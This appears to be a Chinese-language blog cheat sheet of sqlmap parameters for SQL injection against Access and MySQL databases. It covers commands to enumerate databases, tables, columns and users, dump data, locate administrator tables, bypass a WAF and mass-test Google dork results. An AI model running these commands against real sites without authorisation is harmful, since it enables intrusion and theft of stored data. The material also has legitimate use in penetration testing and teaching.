sqlmap可谓是利用sql注入的神器了,sqlmap的参数很多,接下介绍几种常见的参数。
一。注入access数据库常用的参数
sqlmap.py -u "url" //判断参数是否存在注入
sqlmap.py -u "url" --tables //猜解表名
sqlmap.py -u "url" --columns -T "要猜解的表名" //猜解列名
sqlmap.py -u "url" --dump -C "列名" -T “表名” //爆出字段数据
二。注入MySQL数据库常用参数
sqlmap.py -u "url" //判断参数是否存在注入
sqlmap.py -u "url" --current-db //查看网站当前数据库
sqlmap.py -u "url" --is-dba //查看当前用户权限
sqlmap.py -u "url" --tables //猜解表名
sqlmap.py -u "url" --columns -T "要猜解的表名" //猜解列名
sqlmap.py -u "url" --dump -C "列名" -T “表名” //爆出字段数据
三。一些常用参数集合
-h //查看帮助选项
--dbs //查看网站所有数据库
--users //查看所有数据库的用户
--count //统计条数 (该条命令可用在爆表名的时候,便于查看哪个是管理员的表)
--level //测试等级(1-5)默认是1,cookie注入是2,http头注入是3
--dbms=mysql/oracle/mssql 指定数据库(这样既可以节省时间,在某些时候也可以绕过waf)
sqlmap.py -u “url”--batch --exclude-sysdbs //batch是使用sqlmap默认选项,不用按回车;exclude-sysdbs是排除系统自带的数据库
显示调式信息
-v 显示调用信息有7个级别
0, 只显示python错误以及严重的信息
1,同时显示基本信息和警告信息。
2,同时显示debug信息
3,同时显示注入的payload
4,同时显示http请求
5,同时显示http响应头
6,同时显示http响应页面
--risk //风险等级,共有四个等级,1会测试大部分的测试语句,2会增加基于事件的测试语句,3会增加OR语句的sql注入测试
-m //从文本中获取多个目标,文件中保存url格式,sqlmap会一个一个测试 sqlmap.py -m 1.txt
-r //获取http请求注入,sqlmap可以从一个文本文件中获取http请求,这样就可以跳过设置一些其他参数,在存在注入的http请求头加*。
利用的场景:post,搜索注入,http头注入,登陆后的注入(在登录后存在注入点,因为只有在登录后才有cookie)
-g //处理google搜索结果,sqlmap可以测试注入google的搜索结果中的get参数(前100个请求) sqlmap.py -g "inurl:php?id="
原文地址:https://www.cnblogs.com/Da4er/p/10947177.html